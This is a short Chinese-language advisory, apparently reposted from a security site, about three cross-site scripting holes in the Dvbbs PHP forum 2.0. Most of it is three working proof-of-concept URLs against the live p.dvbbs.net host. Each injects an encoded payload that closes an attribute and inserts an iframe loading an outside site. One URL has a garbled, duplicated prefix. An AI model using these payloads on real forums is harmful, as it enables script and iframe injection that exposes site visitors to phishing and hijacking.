动网论坛PHPaspsky 2.0最新多处跨站漏洞

动网论坛做为目前国内最大的社区论坛软件服务提供商，依靠其强大的功能、非凡的访问速度和负载能力、友好方便的客户操作界面、优质的客户服务、国内领先的技术和强大而持续的产品研发并保持不断创新的能力，动网所提供的动网社区论坛产品已经占据了国内社区论坛产品使用比例的70%以上。

目标网站对用户提交的变量代码未进行有效的过滤或转换，允许攻击者插入恶意WEB代码。
 
此版本[5-20]新存在三处跨站漏洞
 
http://p.dvbbs.net/indivgroup_list.php?keyword=%22%3E%3Ciframe%20src=http://www.baoluowanxiang.com%3E
 
demo2:
http://p.dvbbs.net/infolist.phphttp://p.dvbbs.net/infolist.php?t=toplist&orders=7%22%3E%3Ciframe%20src=http://www.baoluowanxiang.com%3E
 
demo3:
http://p.dvbbs.net/announcements.php?action=showone&boardid=0%22%3E%3Ciframe%20src=http://www.baoluowanxiang.com%3E

本文转自 ☆★ 包罗万象网 ★☆ - http://www.baoluowanxiang.com 转载请注明出处，侵权必究！
原文链接：http://www.baoluowanxiang.com/a/net-offense/loophole/2010/0522/880.html